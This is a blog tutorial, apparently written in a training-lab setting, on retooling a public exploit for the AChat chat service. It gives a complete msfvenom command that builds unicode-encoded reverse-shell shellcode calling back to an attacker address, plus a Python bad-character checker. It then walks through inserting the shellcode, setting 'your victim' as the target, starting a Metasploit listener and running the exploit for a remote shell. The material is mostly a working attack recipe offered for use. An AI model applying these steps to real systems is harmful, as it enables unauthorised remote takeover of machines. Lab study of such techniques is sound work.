
Modifying exploits - Generate your own shellcode

Following my other post on modifying exploits, this post will outline a hands-on example to tailor an exploit to our specific situation.

On a box we found the vulnerable AChat service running on port 9256, which should be vulnerable to this exploit.

After analyzing the existing exploit, we see from its comments (green highlighted part) that the current payload shellcode (the second highlighted part) launches calc.exe via cmd. Wouldn't it be nicer to spawn a reverse shell instead?

[screenshot: exploit]

To generate shellcode with the payload we want (a reverse shell connecting back to our IP and port), we use msfvenom with a modified payload parameter (-p), keeping the encoder and bad-character options as they were.

msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp LHOST=10.10.14.6 LPORT=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python 

The first (red) highlighted part shows our modified msfvenom command; the second (green) highlighted part shows the newly generated shellcode.

[screenshot: msfvenom_2]
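Before pasting the generated buffer into the exploit, it is worth confirming that none of the bytes on the -b list survived encoding: the target converts its input to Unicode, so a NUL or any byte from 0x80 upward would be mangled and the payload would be corrupted. The following Python script is an added example (not code from the original post) that parses msfvenom -f python output and reports any bad bytes; the two sample buffers in it are constructed for illustration and are not real shellcode.

```python
"""Check msfvenom '-f python' output for bad characters before pasting it
into an exploit.

Added example, not code from the original post: the parser and the two
sample buffers below are constructed for illustration.
"""
import ast
import re

# Bad-character list from the msfvenom command above: NUL plus every byte
# from 0x80 to 0xff. A target that converts its input to UTF-16 (the reason
# the x86/unicode_mixed encoder is used) cannot carry these bytes unchanged.
BAD_CHARS = frozenset(b"\x00" + bytes(range(0x80, 0x100)))

# Matches the b"..." literals that 'msfvenom -f python' emits, one per line.
_BYTES_LITERAL = re.compile(r'b"(?:[^"\\]|\\.)*"')


def parse_badchars_arg(arg: str) -> frozenset:
    """Turn the quoted -b argument, exactly as typed on the command line
    (single quotes included), into a set of byte values."""
    return frozenset(ast.literal_eval("b" + arg))


def parse_python_buf(text: str) -> bytes:
    """Concatenate every b"..." literal from 'msfvenom -f python' output."""
    out = bytearray()
    for literal in _BYTES_LITERAL.findall(text):
        out += ast.literal_eval(literal)
    return bytes(out)


def find_bad_chars(shellcode: bytes, bad=BAD_CHARS) -> list:
    """Return (offset, byte) pairs for every bad byte, in buffer order."""
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]


def check_buffer(text: str, bad=BAD_CHARS) -> dict:
    """Parse msfvenom output and report its length and any bad bytes."""
    shellcode = parse_python_buf(text)
    hits = find_bad_chars(shellcode, bad)
    return {"length": len(shellcode), "bad": hits, "ok": not hits}


# Constructed sample in the shape of 'msfvenom -f python' output, using the
# printable-ASCII style that x86/unicode_mixed produces. Not real shellcode.
SAMPLE_CLEAN = r'''
buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41"
buf += b"IAIAIAIAjXAQADAZ"
buf += b"ABARALAYAIAQAIAQ"
'''

# Constructed sample that must fail the check: it contains NUL and high bytes.
SAMPLE_DIRTY = r'''
buf =  b""
buf += b"\x41\x00\x42\x80\xff\x43"
'''

if __name__ == "__main__":
    for name, sample in (("clean", SAMPLE_CLEAN), ("dirty", SAMPLE_DIRTY)):
        result = check_buffer(sample)
        verdict = "OK" if result["ok"] else f"bad bytes at {result['bad']}"
        print(f"{name}: {result['length']} bytes, {verdict}")
```

Paste the buffer section of the msfvenom output into a file and pass its contents to check_buffer; an empty "bad" list means the encoder succeeded in avoiding every byte on the list, while any hit means the encoder or bad-character list needs another look before the exploit is run.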

Now replace the shellcode in the original exploit with your newly generated shellcode (the green highlighted part in the screenshot above) and adjust the target IP and port to those of your victim.

[screenshot: PrtScr-capture_4]

Now set up a listener in Metasploit (multi/handler). Use the same payload as you specified with -p when generating the shellcode.

[screenshot: multi-handler]
Note: my LHOST IP differs from the IP used when generating the shellcode because my internal IP changed from 10.10.14.6 to 10.10.14.8 whilst writing this post. You should just take the same IP as you used when generating your shellcode.

The next step is to execute the Python exploit you modified with your generated shellcode. It should now connect back to your listener. Don't forget to chmod +x your exploit to make it executable.

[screenshot: hacked]